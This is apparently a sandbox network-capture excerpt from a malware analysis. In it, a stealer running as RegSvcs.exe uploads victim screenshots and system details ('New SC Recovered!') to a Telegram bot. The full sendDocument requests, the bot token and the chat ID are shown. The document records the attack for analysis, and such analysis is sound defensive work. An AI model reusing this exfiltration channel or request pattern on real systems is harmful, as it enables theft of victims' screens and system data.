2024-12-06 04:53:42 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:53:42 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:53:42 UTC	1360	OUT	Data Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5 Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
2024-12-06 04:53:42 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 36 37 36 37 33 37 31 38 35 34 32 2d 2d 0d 0a Data Ascii: -----------------------------8dd567673718542--
2024-12-06 04:53:42 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:53:43 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:53:42 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170410,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460822,"document":{"file_name":"user-610930 2025-02-26 15-01-29.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZqmdSg1YnChBaVQxamPueraR0MRkGAAL3FAACOh6ZUlrkha8OwLk6AQAHbQADNgQ","file_unique_id":"AQAD9xQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZqmdSg1YnChBaVQxamPueraR0MRkGAAL3FAACOh6ZUlrkha8OwLk6AQAHbQADNgQ","file_unique_id":"AQAD9xQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmapnUoNWJwoQWlUMWpj7nq2kdDEZBgAC9xQAAjoemVJa5IWvDsC5OjYE","file_unique_id":"AgAD9xQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 02/26/2025 15:01:23\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50006	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:53:44 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd590601fddcca Host: api.telegram.org Content-Length: 66946 Expect: 100-continue Connection: Keep-Alive
2024-12-06 04:53:45 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 39 30 36 30 31 66 64 64 63 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 39 30 36 30 31 66 64 64 63 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 30 31 2f 32 30 32 35 20 32 31 3a 30 34 3a 30 37 0a 55 73 65 72 Data Ascii: -----------------------------8dd590601fddccaContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd590601fddccaContent-Disposition: form-data; name="caption"New SC Recovered!Time: 03/01/2025 21:04:07User
2024-12-06 04:53:45 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:53:45 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:53:45 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:53:45 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:53:45 UTC	1360	OUT	Data Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5 Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
2024-12-06 04:53:45 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 39 30 36 30 31 66 64 64 63 63 61 2d 2d 0d 0a Data Ascii: -----------------------------8dd590601fddcca--
2024-12-06 04:53:45 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:53:46 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:53:45 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170411,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460825,"document":{"file_name":"user-610930 2025-03-01 21-14-09.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZq2dSg1ldLmFRiUqELUndsEjBXZXBAAL4FAACOh6ZUkJ1BXTjUa1GAQAHbQADNgQ","file_unique_id":"AQAD-BQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZq2dSg1ldLmFRiUqELUndsEjBXZXBAAL4FAACOh6ZUkJ1BXTjUa1GAQAHbQADNgQ","file_unique_id":"AQAD-BQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmatnUoNZXS5hUYlKhC1J3bBIwV2VwQAC-BQAAjoemVJCdQV041GtRjYE","file_unique_id":"AgAD-BQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 03/01/2025 21:04:07\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50028	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:54:12 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd6453ae6e3e4e Host: api.telegram.org Content-Length: 66944 Expect: 100-continue Connection: Keep-Alive
2024-12-06 04:54:13 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 34 35 33 61 65 36 65 33 65 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 34 35 33 61 65 36 65 33 65 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 31 36 2f 32 30 32 35 20 30 36 3a 31 37 3a 34 35 0a 55 73 65 72 Data Ascii: -----------------------------8dd6453ae6e3e4eContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd6453ae6e3e4eContent-Disposition: form-data; name="caption"New SC Recovered!Time: 03/16/2025 06:17:45User
2024-12-06 04:54:13 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:54:13 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:54:13 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:54:13 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:54:13 UTC	1358	OUT	Data Raw: 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb c8 76 83 8f 4d dd 7f 5a f3 3a 2b 9e a5 17 24 d4 25 6b 99 c6 9a 8c f9 ba 76 3b 7f 15 78 9e 07 b5 7b 0b 09 04 86 41 89 24 5e 80 7a 0f 5a e2 28 a2 8c 3e 1e 18 78 72 40 e8 a9 51 d4 Data Ascii: (Q@>'..V/1q\:39u{<3+O$>(((t18[G\?ImyM c`:h(%mX:BlnN3ETb{uw}(j"X'm+zN vMZ:+$%kv;x{A$^zZ(>xr@Q
2024-12-06 04:54:13 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 34 35 33 61 65 36 65 33 65 34 65 2d 2d 0d 0a Data Ascii: -----------------------------8dd6453ae6e3e4e--
2024-12-06 04:54:13 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:54:14 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:54:13 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170412,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460853,"document":{"file_name":"user-610930 2025-03-16 